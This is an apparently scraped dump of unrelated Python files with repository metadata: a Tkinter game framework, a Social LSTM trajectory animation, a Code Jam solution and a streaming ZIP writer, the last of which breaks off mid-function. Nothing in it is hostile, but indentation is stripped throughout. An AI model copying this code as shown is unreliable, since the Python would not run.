else:
newDims =(app.width, app.height, app.winx, app.winy)
if (app._lastWindowDims != newDims):
app._lastWindowDims = newDims
app.updateTitle()
app.sizeChanged()
app._deferredRedrawAll() # avoid resize crashing on some platforms
@_safeMethod
def _mouseMotionWrapper(app):
if (not app._running): return
mouseMovedExists = app._methodIsOverridden('mouseMoved')
mouseDraggedExists = app._methodIsOverridden('mouseDragged')
if ((not app._paused) and
(not app._mousePressedOutsideWindow) and
(((not app._mouseIsPressed) and mouseMovedExists) or
(app._mouseIsPressed and mouseDraggedExists))):
class MouseMotionEvent(object): pass
event = MouseMotionEvent()
root = app._root
event.x = root.winfo_pointerx() - root.winfo_rootx()
event.y = root.winfo_pointery() - root.winfo_rooty()
event = App.MouseEventWrapper(event)
if ((app._lastMousePosn != (event.x, event.y)) and
(event.x >= 0) and (event.x <= app.width) and
(event.y >= 0) and (event.y <= app.height)):
if (app._mouseIsPressed): app.mouseDragged(event)
else: app.mouseMoved(event)
app._lastMousePosn = (event.x, event.y)
app._redrawAllWrapper()
if (mouseMovedExists or mouseDraggedExists):
app._deferredMethodCall(afterId='mouseMotionWrapper', afterDelay=app.mouseMovedDelay, afterFn=app._mouseMotionWrapper)
def updateTitle(app):
app._title = app._title or type(app).__name__
app._root.title(f'{app._title} ({app.width} x {app.height})')
def getQuitMessage(app):
appLabel = type(app).__name__
if (app._title != appLabel):
if (app._title.startswith(appLabel)):
appLabel = app._title
else:
appLabel += f" '{app._title}'"
return f"*** Closing {appLabel}. Bye! ***\n"
def _showRootWindow(app):
root = app._root
root.update(); root.deiconify(); root.lift(); root.focus()
def _hideRootWindow(app):
root = app._root
root.withdraw()
@_safeMethod
def run(app):
app._mouseIsPressed = False
app._lastMousePosn = (-1, -1)
app._lastWindowDims= None # set in sizeChangedWrapper
app._afterIdMap = dict()
# create the singleton root window
if (App._theRoot is None):
App._theRoot = Tk()
App._theRoot.createcommand('exit', lambda: '') # when user enters cmd-q, ignore here (handled in keyPressed)
App._theRoot.protocol('WM_DELETE_WINDOW', lambda: App._theRoot.app.quit()) # when user presses 'x' in title bar
App._theRoot.bind("<Button-1>", lambda event: App._theRoot.app._mousePressedWrapper(event))
App._theRoot.bind("<B1-ButtonRelease>", lambda event: App._theRoot.app._mouseReleasedWrapper(event))
App._theRoot.bind("<KeyPress>", lambda event: App._theRoot.app._keyPressedWrapper(event))
App._theRoot.bind("<KeyRelease>", lambda event: App._theRoot.app._keyReleasedWrapper(event))
App._theRoot.bind("<Configure>", lambda event: App._theRoot.app._sizeChangedWrapper(event))
else:
App._theRoot.canvas.destroy()
app._root = root = App._theRoot # singleton root!
root.app = app
root.geometry(f'{app.width}x{app.height}+{app.winx}+{app.winy}')
app.updateTitle()
# create the canvas
root.canvas = app._canvas = WrappedCanvas(app)
app._canvas.pack(fill=BOTH, expand=YES)
# initialize, start the timer, and launch the app
app._running = True
app._paused = False
app._ignoredFields = set(app.__dict__.keys()) | {'_ignoredFields'}
app._appStartedWrapper()
app._timerFiredWrapper()
app._mouseMotionWrapper()
app._showRootWindow()
root.mainloop()
app._hideRootWindow()
app._running = False
for afterId in app._afterIdMap: app._root.after_cancel(app._afterIdMap[afterId])
app._afterIdMap.clear() # for safety
app.appStopped()
print(app.getQuitMessage())
####################################
# Ultimate_TTT:
# (with top-level functions not subclassses and methods)
####################################
class Ultimate_TTT(App):
_apps = dict() # maps fnPrefix to app
def __init__(app, fnPrefix='', **kwargs):
if (fnPrefix in Ultimate_TTT._apps):
print(f'Quitting previous version of {fnPrefix} Ultimate_TTT.')
Ultimate_TTT._apps[fnPrefix].quit()
if ((fnPrefix != '') and ('title' not in kwargs)):
kwargs['title'] = f"Ultimate_TTT '{fnPrefix}'"
Ultimate_TTT._apps[fnPrefix] = app
app._fnPrefix = fnPrefix
app._callersGlobals = inspect.stack()[1][0].f_globals
app.mode = None
super().__init__(**kwargs)
def _callFn(app, fn, *args):
if (app.mode != None) and (app.mode != ''):
fn = app.mode + '_' + fn
fn = app._fnPrefix + fn
if (fn in app._callersGlobals): app._callersGlobals[fn](*args)
def redrawAll(app, canvas): app._callFn('redrawAll', app, canvas)
def appStarted(app): app._callFn('appStarted', app)
def appStopped(app): app._callFn('appStopped', app)
def keyPressed(app, event): app._callFn('keyPressed', app, event)
def keyReleased(app, event): app._callFn('keyReleased', app, event)
def mousePressed(app, event): app._callFn('mousePressed', app, event)
def mouseReleased(app, event): app._callFn('mouseReleased', app, event)
def mouseMoved(app, event): app._callFn('mouseMoved', app, event)
def mouseDragged(app, event): app._callFn('mouseDragged', app, event)
def timerFired(app): app._callFn('timerFired', app)
def sizeChanged(app): app._callFn('sizeChanged', app)
####################################
# ModalApp + Mode:
####################################
'''
# For now, only include modes in top-level apps (see above).
class Mode(object):
def __repr__(self): return f'<{self.__class__.__name__} object>'
class ModalApp(App):
def __init__(app, *args, **kwargs):
app._mode = None
super().__init__(*args, **kwargs)
def setMode(app, mode):
if (not isinstance(mode, Mode)):
raise Exception('mode must be an instance of Mode')
app._mode = mode
def _callFn(app, fn, *args):
if (app._mode == None):
raise Exception('ModalApp must have a mode (use app.setMode())')
mode = app._mode
# method = getattr(mode, fn, None)
method = mode.__class__.__dict__.get(fn) # get method as fn
if (method != None):
method(*args)
def redrawAll(app, canvas): app._callFn('redrawAll', app, canvas)
#def appStarted(app): app._callFn('appStarted', app)
#def appStopped(app): app._callFn('appStopped', app)
def keyPressed(app, event): app._callFn('keyPressed', app, event)
def keyReleased(app, event): app._callFn('keyReleased', app, event)
def mousePressed(app, event): app._callFn('mousePressed', app, event)
def mouseReleased(app, event): app._callFn('mouseReleased', app, event)
def mouseMoved(app, event): app._callFn('mouseMoved', app, event)
def mouseDragged(app, event): app._callFn('mouseDragged', app, event)
def timerFired(app): app._callFn('timerFired', app)
def sizeChanged(app): app._callFn('sizeChanged', app)
'''
####################################
# runApp()
####################################
'''
def showGraphics(drawFn, **kwargs):
class GraphicsApp(App):
def __init__(app, **kwargs):
if ('title' not in kwargs):
kwargs['title'] = drawFn.__name__
super().__init__(**kwargs)
def redrawAll(app, canvas):
drawFn(app, canvas)
app = GraphicsApp(**kwargs)
'''
runApp = Ultimate_TTT
print(f'Loaded cmu_112_graphics version {App.version} (last updated {App.lastUpdated})')
if (__name__ == '__main__'):
try: import cmu_112_graphics_tests
except: pass
| [
"zymason@andrew.cmu.edu"
] | zymason@andrew.cmu.edu |
73dacc7715c02dbfa010874019e07b248336cfc6 | d6edd6b1405eb90b1e8d92d27863bf417b5e2ddd | /Animation.py | e25bda0198497ef53c3fa0618d7c825e52ba30f7 | [] | no_license | ttomchy/Social_LSTM | 0580afb7c31a2963df7e8ca01aba59bcc8a371f2 | e71c5c2a2c2105abc8e66e38e8d16db52d27a36a | refs/heads/master | 2022-09-21T10:36:16.677377 | 2020-06-04T13:59:29 | 2020-06-04T13:59:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,035 | py | '''
Baseline implementation: https://github.com/ajvirgona/social-lstm-pytorch/tree/master/social_lstm
By Author: Anirudh Vemula
Date: 13th June 2017
Improvements: 1\ Adjust test.py and train.py to accommodate vanilla lstm-> vlstm_train.py, vlstm_test.py
2\ Adjust optimizer
3\ reimplementing model.py and vlstm_model.py
4\ Add Animation.py
'''
import pickle
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import random
def visualize(data):
#data: results[i]
'''
len(results): num_of_batches
data[0] : Numpy matrix of shape seq_length x numNodes x 2
Contains the true trajectories of the nodes
data[1] : Numpy matrix of shape seq_length x numNodes x 2
Contains the predicted trajectories of the nodes
data[2] : A list of lists, of size seq_length
Each list contains the nodeIDs present at that time-step
data[3] : Length of observed trajectory
'''
anim_running = False
# Get the number of pedestrains in the frame
max_peds = data[0].shape[1]
# Get the number of frames
max_frames = data[0].shape[0]
# initialize figure
fig = plt.figure()
plt.axis('equal')
plt.grid()
ax = fig.add_subplot(111)
ax.set_xlim(-0.2, 1.2)
ax.set_ylim(-0.2, 1.2)
ax.plot([0, 1, 1, 0, 0], [0, 0, 1, 1, 0], color="black")
# ground truth
peds_line = []
peds_dot = []
# prediction
peds_line_predict = []
peds_dot_predict = []
#initialize color for different pedestrain
color = np.random.rand(3, max_peds)
for i in range(max_peds):
temp = ax.plot([], [],'-', lw=2,label = str(i), c = color[:,i])
peds_line.extend(temp)
temp = ax.plot([], [],'p', lw=2, label=str(i), c=color[:,i])
peds_dot.extend(temp)
temp = ax.plot([], [],'--', lw=2,label = str(i), c = color[:,i])
peds_line_predict.extend(temp)
temp = ax.plot([], [],'o', lw=2, label=str(i), c=color[:,i])
peds_dot_predict.extend(temp)
fig.subplots_adjust(top=0.8)
def init():
for ped_line in peds_line:
ped_line.set_data([], [])
for ped_dot in peds_dot:
ped_dot.set_data([], [])
for ped_line in peds_line_predict:
ped_line.set_data([], [])
for ped_dot in peds_dot_predict:
ped_dot.set_data([], [])
return peds_line,peds_dot,peds_line_predict, peds_dot_predict
def animate(i):
print('frame:', i, 'from: ', max_frames)
ped_list = data[2][i]
for ped_num, ped_line in enumerate(peds_line):
if ped_num not in ped_list:
ped_line.set_data([], [])
peds_dot[ped_num].set_data([],[])
peds_line_predict[ped_num].set_data([], [])
peds_dot_predict[ped_num].set_data([],[])
else:
(x1,y1) = ped_line.get_data()
(x2,y2) = peds_line_predict[ped_num].get_data()
ped_line.set_data(np.hstack((x1[:],data[0][i, ped_num, 0])), np.hstack((y1[:],data[0][i, ped_num, 1])))
peds_line_predict[ped_num].set_data(np.hstack((x2[:],data[1][i, ped_num, 0])), np.hstack((y2[:],data[1][i, ped_num, 1])))
peds_dot[ped_num].set_data(data[0][i,ped_num,0], data[0][i,ped_num,1])
peds_dot_predict[ped_num].set_data(data[1][i,ped_num,0], data[1][i,ped_num,1])
return peds_line, peds_dot, peds_line_predict, peds_dot_predict
# You can pause the animation by clicking on it.
def onClick(event):
nonlocal anim_running
if anim_running:
anim.event_source.stop()
anim_running = False
else:
anim.event_source.start()
anim_running = True
fig.canvas.mpl_connect('button_press_event', onClick)
# Set up formatting for the movie files
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
writer = animation.FFMpegWriter()
anim = animation.FuncAnimation(fig, animate,
init_func=init,
frames=max_frames,
interval=500)
anim.save('social4.mp4', writer = writer)
#anim.save('ground_truth_02.html')
plt.show()
def main():
test_dataset = '4'
save_directory = 'save_social_model/'
save_directory += str(test_dataset) + '/'
plot_directory = 'plot/'
f = open(save_directory + 'results3_05.pkl', 'rb')
results = pickle.load(f)
size = len(results)
BATCH_result = results[-1]
visualize(BATCH_result)
f.close()
if __name__ == '__main__':
main() | [
"wanxinyu0001@gmail.com"
] | wanxinyu0001@gmail.com |
9b4da458ddc0baab23ff6849c6435da673740b91 | 50ca8d6e7f989854f3059cf721c40225f340b774 | /python/Move.py | 16498e1d053c013a7b76e5e9a2642d892f9a1c3a | [] | no_license | atwenzel/assignment2 | af07b551ef6861e7412c2e2b9447cf238b122d43 | e9224575f1ba393df00de28e1450d257afee4c6c | refs/heads/master | 2021-01-19T06:37:11.330864 | 2017-06-07T13:11:57 | 2017-06-07T13:11:57 | 87,470,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | """
Implements the Move base class
"""
#Global
#Local
from Pawn import Pawn
class Move:
def __init__(self, pawn):
self.pawn = pawn
if __name__ == "__main__":
print("Base Move class")
| [
"alexanderwenzel2017@u.northwestern.edu"
] | alexanderwenzel2017@u.northwestern.edu |
06c23408811bd37ee1ea076d37ef63244b96f858 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/945.py | a43e4458d2b1f38b912356b2ce0d2242713cfb2c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | def nombre_ami(b):
debout = 0
ami = 0
compteur = 0
ami_en_plus = 0
for chiffre in b:
if compteur > debout:
ami_en_plus = (compteur - debout)
ami += ami_en_plus
debout += ami_en_plus
debout += int(chiffre)
compteur += 1
return str(ami)
def solution_jam1():
source = open("D:/Download/test.txt","r")
output = open("D:/Download/jam1long.txt","w")
liste = source.readline()
liste = liste.split('\n')
for i in range(int(liste[0])):
liste = source.readline()
liste = liste.split()
output.write('Case #'+str(i+1)+': '+nombre_ami(liste[1])+'\n')
output.close()
source.close()
solution_jam1()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
3ce6e46050c23393ede97fc6e868480a8d50301b | 783b3c3ca0ee158802f1946073eb4fc5b1c6d5a2 | /xlib/ziplib_spec.py | df549054b61e7c90cdb54130c5cb01afc3fa2e18 | [] | no_license | ggjjlldd/zipserver | dd6d7fab58c132e7eead781c29c831b209c20837 | e80d6ef81420050d737ba983b752e692ccb6ee88 | refs/heads/master | 2020-05-20T07:42:50.714315 | 2013-09-24T02:07:33 | 2013-09-24T02:07:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,995 | py | """
Read and write ZIP files.
"""
import struct, os, time, sys, shutil
import binascii, cStringIO, stat
import io
import re
import chardet
try:
import zlib # We may need its compression method
crc32 = zlib.crc32
except ImportError:
zlib = None
crc32 = binascii.crc32
__all__ = ["BadZipfile", "error", "ZIP_STORED", "ZIP_DEFLATED", "is_zipfile",
"ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile" ]
class BadZipfile(Exception):
pass
class LargeZipFile(Exception):
pass
class TooManyFiles(Exception):
pass
error = BadZipfile # The exception raised by this module
ZIP64_LIMIT = (1 << 31) - 1
ZIP_FILECOUNT_LIMIT = 1 << 16
ZIP_MAX_COMMENT = (1 << 16) - 1
# constants for Zip file compression methods
ZIP_STORED = 0
ZIP_DEFLATED = 8
# Other ZIP compression methods not supported
# Below are some formats and associated data for reading/writing headers using
# the struct module. The names and structures of headers/records are those used
# in the PKWARE description of the ZIP file format:
# http://www.pkware.com/documents/casestudies/APPNOTE.TXT
# (URL valid as of January 2008)
# The "end of central directory" structure, magic number, size, and indices
# (section V.I in the format document)
structEndArchive = "<4s4H2LH"
stringEndArchive = "PK\005\006"
sizeEndCentDir = struct.calcsize(structEndArchive)
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
# These last two indices are not part of the structure as defined in the
# spec, but they are used internally by this module as a convenience
_ECD_COMMENT = 8
_ECD_LOCATION = 9
# The "central directory" structure, magic number, size, and indices
# of entries in the structure (section V.F in the format document)
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = "PK\001\002"
sizeCentralDir = struct.calcsize(structCentralDir)
# indexes of entries in the central directory structure
_CD_SIGNATURE = 0
_CD_CREATE_VERSION = 1
_CD_CREATE_SYSTEM = 2
_CD_EXTRACT_VERSION = 3
_CD_EXTRACT_SYSTEM = 4
_CD_FLAG_BITS = 5
_CD_COMPRESS_TYPE = 6
_CD_TIME = 7
_CD_DATE = 8
_CD_CRC = 9
_CD_COMPRESSED_SIZE = 10
_CD_UNCOMPRESSED_SIZE = 11
_CD_FILENAME_LENGTH = 12
_CD_EXTRA_FIELD_LENGTH = 13
_CD_COMMENT_LENGTH = 14
_CD_DISK_NUMBER_START = 15
_CD_INTERNAL_FILE_ATTRIBUTES = 16
_CD_EXTERNAL_FILE_ATTRIBUTES = 17
_CD_LOCAL_HEADER_OFFSET = 18
# The "local file header" structure, magic number, size, and indices
# (section V.A in the format document)
structFileHeader = "<4s2B4HL2L2H"
stringFileHeader = "PK\003\004"
sizeFileHeader = struct.calcsize(structFileHeader)
_FH_SIGNATURE = 0
_FH_EXTRACT_VERSION = 1
_FH_EXTRACT_SYSTEM = 2
_FH_GENERAL_PURPOSE_FLAG_BITS = 3
_FH_COMPRESSION_METHOD = 4
_FH_LAST_MOD_TIME = 5
_FH_LAST_MOD_DATE = 6
_FH_CRC = 7
_FH_COMPRESSED_SIZE = 8
_FH_UNCOMPRESSED_SIZE = 9
_FH_FILENAME_LENGTH = 10
_FH_EXTRA_FIELD_LENGTH = 11
# The "Zip64 end of central directory locator" structure, magic number, and size
structEndArchive64Locator = "<4sLQL"
stringEndArchive64Locator = "PK\x06\x07"
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)
# The "Zip64 end of central directory" record, magic number, size, and indices
# (section V.G in the format document)
structEndArchive64 = "<4sQ2H2L4Q"
stringEndArchive64 = "PK\x06\x06"
sizeEndCentDir64 = struct.calcsize(structEndArchive64)
_CD64_SIGNATURE = 0
_CD64_DIRECTORY_RECSIZE = 1
_CD64_CREATE_VERSION = 2
_CD64_EXTRACT_VERSION = 3
_CD64_DISK_NUMBER = 4
_CD64_DISK_NUMBER_START = 5
_CD64_NUMBER_ENTRIES_THIS_DISK = 6
_CD64_NUMBER_ENTRIES_TOTAL = 7
_CD64_DIRECTORY_SIZE = 8
_CD64_OFFSET_START_CENTDIR = 9
def _check_zipfile(fp):
try:
if _EndRecData(fp):
return True # file has correct magic number
except IOError:
pass
return False
def is_zipfile(filename):
"""Quickly see if a file is a ZIP file by checking the magic number.
The filename argument may be a file or file-like object too.
"""
result = False
try:
if hasattr(filename, "read"):
result = _check_zipfile(fp=filename)
else:
with open(filename, "rb") as fp:
result = _check_zipfile(fp)
except IOError:
pass
return result
def _EndRecData64(fpin, offset, endrec):
"""
Read the ZIP64 end-of-archive records and use that to update endrec
"""
try:
fpin.seek(offset - sizeEndCentDir64Locator, 2)
except IOError:
# If the seek fails, the file is not large enough to contain a ZIP64
# end-of-archive record, so just return the end record we were given.
return endrec
data = fpin.read(sizeEndCentDir64Locator)
sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
if sig != stringEndArchive64Locator:
return endrec
if diskno != 0 or disks != 1:
raise BadZipfile("zipfiles that span multiple disks are not supported")
# Assume no 'zip64 extensible data'
fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
data = fpin.read(sizeEndCentDir64)
sig, sz, create_version, read_version, disk_num, disk_dir, \
dircount, dircount2, dirsize, diroffset = \
struct.unpack(structEndArchive64, data)
if sig != stringEndArchive64:
return endrec
# Update the original endrec using data from the ZIP64 record
endrec[_ECD_SIGNATURE] = sig
endrec[_ECD_DISK_NUMBER] = disk_num
endrec[_ECD_DISK_START] = disk_dir
endrec[_ECD_ENTRIES_THIS_DISK] = dircount
endrec[_ECD_ENTRIES_TOTAL] = dircount2
endrec[_ECD_SIZE] = dirsize
endrec[_ECD_OFFSET] = diroffset
return endrec
def _EndRecData(fpin):
"""Return data from the "End of Central Directory" record, or None.
The data is a list of the nine items in the ZIP "End of central dir"
record followed by a tenth item, the file seek offset of this record."""
# Determine file size
fpin.seek(0, 2)
filesize = fpin.tell()
# Check to see if this is ZIP file with no archive comment (the
# "end of central directory" structure should be the last item in the
# file if this is the case).
try:
fpin.seek(-sizeEndCentDir, 2)
except IOError:
return None
data = fpin.read()
if data[0:4] == stringEndArchive and data[-2:] == "\000\000":
# the signature is correct and there's no comment, unpack structure
endrec = struct.unpack(structEndArchive, data)
endrec=list(endrec)
# Append a blank comment and record start offset
endrec.append("")
endrec.append(filesize - sizeEndCentDir)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, -sizeEndCentDir, endrec)
# Either this is not a ZIP file, or it is a ZIP file with an archive
# comment. Search the end of the file for the "end of central directory"
# record signature. The comment is the last item in the ZIP file and may be
# up to 64K long. It is assumed that the "end of central directory" magic
# number does not appear in the comment.
maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0)
fpin.seek(maxCommentStart, 0)
data = fpin.read()
start = data.rfind(stringEndArchive)
if start >= 0:
# found the magic number; attempt to unpack and interpret
recData = data[start:start+sizeEndCentDir]
endrec = list(struct.unpack(structEndArchive, recData))
commentSize = endrec[_ECD_COMMENT_SIZE] #as claimed by the zip file
comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize]
endrec.append(comment)
endrec.append(maxCommentStart + start)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, maxCommentStart + start - filesize,
endrec)
# Unable to find a valid end of central directory structure
return
class ZipInfo (object):
"""Class with attributes describing each file in the ZIP archive."""
__slots__ = (
'orig_filename',
'filename',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'CRC',
'compress_size',
'file_size',
'_raw_time',
'encoding',
)
def __init__(self, filename="NoName", encoding = 'utf-8', date_time=(1980,1,1,0,0,0)):
self.orig_filename = filename # Original file name in archive
# Terminate the file name at the first null byte. Null bytes in file
# names are used as tricks by viruses in archives.
null_byte = filename.find(chr(0))
if null_byte >= 0:
filename = filename[0:null_byte]
# This is used to ensure paths in generated ZIP files always use
# forward slashes as the directory separator, as required by the
# ZIP format specification.
if os.sep != "/" and os.sep in filename:
filename = filename.replace(os.sep, "/")
self.encoding = encoding
self.filename = filename # Normalized file name
self.date_time = date_time # year, month, day, hour, min, sec
if date_time[0] < 1980:
raise ValueError('ZIP does not support timestamps before 1980')
# Standard values:
self.compress_type = ZIP_STORED # Type of compression for the file
self.comment = "" # Comment for each file
self.extra = "" # ZIP extra data
if sys.platform == 'win32':
self.create_system = 0 # System which created ZIP archive
else:
# Assume everything else is unix-y
self.create_system = 3 # System which created ZIP archive
self.create_version = 20 # Version which created ZIP archive
self.extract_version = 20 # Version needed to extract archive
self.reserved = 0 # Must be zero
self.flag_bits = 0 # ZIP flag bits
self.volume = 0 # Volume number of file header
self.internal_attr = 0 # Internal attributes
self.external_attr = 0 # External file attributes
# Other attributes are set by class ZipFile:
# header_offset Byte offset to the file header
# CRC CRC-32 of the uncompressed file
# compress_size Size of the compressed file
# file_size Size of the uncompressed file
def FileHeader(self):
"""Return the per-file header as a string."""
dt = self.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
if self.flag_bits & 0x08:
# Set these to zero because we write them after the file data
CRC = compress_size = file_size = 0
else:
CRC = self.CRC
compress_size = self.compress_size
file_size = self.file_size
extra = self.extra
if file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT:
raise LargeZipFile("Filesize would require ZIP64 extensions")
filename, flag_bits = self._encodeFilenameFlags()
header = struct.pack(structFileHeader, stringFileHeader,
self.extract_version, self.reserved, flag_bits,
self.compress_type, dostime, dosdate, CRC,
compress_size, file_size,
len(filename), len(extra))
return header + filename + extra
def _encodeFilenameFlags(self):
if isinstance(self.filename, unicode):
try:
return self.filename.encode(self.encoding), self.flag_bits
except UnicodeEncodeError:
return self.filename.encode('utf-8'), self.flag_bits | 0x800
else:
end = chardet.detect(self.filename)['encoding']
self.filename = self.filename.decode(end).encode(self.encoding)
return self.filename, self.flag_bits
def _decodeFilename(self):
if self.flag_bits & 0x800:
return self.filename.decode('utf-8')
else:
return self.filename
def _decodeExtra(self):
# Try to decode the extra field.
extra = self.extra
unpack = struct.unpack
while extra:
tp, ln = unpack('<HH', extra[:4])
if tp == 1:
if ln >= 24:
counts = unpack('<QQQ', extra[4:28])
elif ln == 16:
counts = unpack('<QQ', extra[4:20])
elif ln == 8:
counts = unpack('<Q', extra[4:12])
elif ln == 0:
counts = ()
else:
raise RuntimeError, "Corrupt extra field %s"%(ln,)
idx = 0
# ZIP64 extension (large files and/or large archives)
if self.file_size in (0xffffffffffffffffL, 0xffffffffL):
self.file_size = counts[idx]
idx += 1
if self.compress_size == 0xFFFFFFFFL:
self.compress_size = counts[idx]
idx += 1
if self.header_offset == 0xffffffffL:
old = self.header_offset
self.header_offset = counts[idx]
idx+=1
extra = extra[ln+4:]
class ZipFile:
""" Class with methods to open, read, write, close, list zip files.
z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=False)
file: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression) or ZIP_DEFLATED (requires zlib).
allowZip64: if True ZipFile will create files with ZIP64 extensions when
needed, otherwise it will raise an exception when this would
be necessary.
"""
fp = None # Set here since __del__ checks it
def __init__(self, encoding = 'utf-8', mode="r", compression=ZIP_STORED, allowZip64=False):
"""Open the ZIP file with mode read "r", write "w" or append "a"."""
if mode not in ("r", "w", "a"):
raise RuntimeError('ZipFile() requires mode "r", "w", or "a"')
if compression == ZIP_STORED:
pass
elif compression == ZIP_DEFLATED:
if not zlib:
raise RuntimeError,\
"Compression requires the (missing) zlib module"
else:
raise RuntimeError, "That compression method is not supported"
self._allowZip64 = allowZip64
self._didModify = False
self.debug = 0 # Level of printing: 0 through 3
self.NameToInfo = {} # Find file info given name
self.filelist = [] # List of ZipInfo instances for archive
self.compression = compression # Method of compression
self.mode = key = mode.replace('b', '')[0]
self.pwd = None
self.comment = ''
self.pos = 0
self.encoding = encoding
# Check if we were passed a file-like object
if key == 'r':
pass
elif key == 'w':
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
elif key == 'a':
pass
else:
raise RuntimeError, 'Mode must be "r", "w" or "a"'
def _writecheck(self, zinfo):
"""Check for errors before writing a file to the archive."""
if zinfo.filename in self.NameToInfo:
if self.debug: # Warning for duplicate names
print "Duplicate name:", zinfo.filename
if self.mode not in ("w", "a"):
raise RuntimeError, 'write() requires mode "w" or "a"'
if zinfo.compress_type == ZIP_DEFLATED and not zlib:
raise RuntimeError, \
"Compression requires the (missing) zlib module"
if zinfo.compress_type not in (ZIP_STORED, ZIP_DEFLATED):
raise RuntimeError, \
"That compression method is not supported"
if zinfo.file_size > ZIP64_LIMIT:
raise LargeZipFile
if zinfo.header_offset > ZIP64_LIMIT:
raise LargeZipFile
def calc_size(self, size_list):
size = (sizeFileHeader + 12 + sizeCentralDir) * len(size_list)
for k,v in size_list:
size = size + int(k) + 2*len(v)
return size + sizeEndCentDir
def write(self, iterator, size, mtime, arcname=None, compress_type=None):
mtime = mtime
date_time = mtime[0:6]
zinfo = ZipInfo(arcname, self.encoding, date_time)
if compress_type is None:
zinfo.compress_type = self.compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = size
zinfo.flag_bits = 0x08
zinfo.header_offset = self.pos # Start of header bytes
try:
self._writecheck(zinfo)
except:
raise
self._didModify = True
zinfo.external_attr = (0777 & 0xFFFF) << 16L
zinfo.CRC = CRC = 0
zinfo.compress_size = compress_size = 0
zinfo.file_size = file_size = 0
try:
compress_trunk = zinfo.FileHeader()
except:
raise LargeZipFile
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
for trunk in iterator:
file_size = file_size + len(trunk)
CRC = crc32(trunk, CRC) & 0xffffffff
compress_trunk = trunk
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
zinfo.compress_size = file_size
zinfo.CRC = CRC
zinfo.file_size = file_size
compress_trunk = struct.pack("<LLL", zinfo.CRC, zinfo.compress_size,
zinfo.file_size)
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
def close(self):
trunk = ''
size_d = 0
if self.mode in ("w", "a") and self._didModify: # write ending records
count = 0
for zinfo in self.filelist: # write central directory
count = count + 1
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
extra = []
file_size = zinfo.file_size
compress_size = zinfo.compress_size
header_offset = zinfo.header_offset
extra_data = zinfo.extra
extract_version = zinfo.extract_version
create_version = zinfo.create_version
try:
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
except DeprecationWarning:
print >>sys.stderr, (structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
zinfo.flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(zinfo.filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
trunk = centdir + filename + extra_data + zinfo.comment
size_d = size_d + len(trunk)
yield trunk
# Write end-of-zip-archive record
centDirCount = count
centDirSize = size_d
centDirOffset = self.pos
if (centDirCount >= ZIP_FILECOUNT_LIMIT or
centDirOffset > ZIP64_LIMIT or
centDirSize > ZIP64_LIMIT):
raise TooManyFiles
endrec = struct.pack(structEndArchive, stringEndArchive,
0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset, len(self.comment))
trunk = endrec + self.comment
yield trunk
def calc(source, archive):
pos = 0
count = 0
pos_s = 0
size_d = []
for file_item in source:
it, file_size, file_path, mtime = file_item
mtime = time.localtime(mtime)
item = (file_size, file_path)
size_d.append(item)
size_c = archive.calc_size(size_d)
return size_c
def calc_size(source, archive):
size_c = archive.calc_size(source)
return size_c
def file_wss(source, archive):
try:
pos = 0
count = 0
pos_s = 0
for file_item in source:
it, file_size, file_path, mtime = file_item
mtime = time.localtime(mtime)
iterator = archive.write(it, file_size, mtime, file_path)
for i in iterator:
yield i
except:
#raise LargeZipFile
raise
try:
iterator = archive.close()
